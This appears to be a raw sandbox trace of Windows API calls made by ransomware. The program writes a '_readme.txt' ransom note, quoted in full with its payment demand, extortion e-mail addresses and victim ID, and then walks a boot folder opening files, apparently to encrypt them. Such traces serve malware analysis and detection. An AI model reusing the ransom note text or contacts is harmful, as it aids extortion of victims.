[0178.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.709] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0178.709] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.709] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.710] PathFindFileNameW (pszPath="") returned="" [0178.710] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.710] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.711] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.711] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.711] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0178.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.712] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0178.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.712] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.712] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.712] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.714] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*" (normalized: "c:\\boot\\el-gr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.714] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.714] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0178.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.715] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0178.715] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.719] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0178.719] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.720] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.720] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: 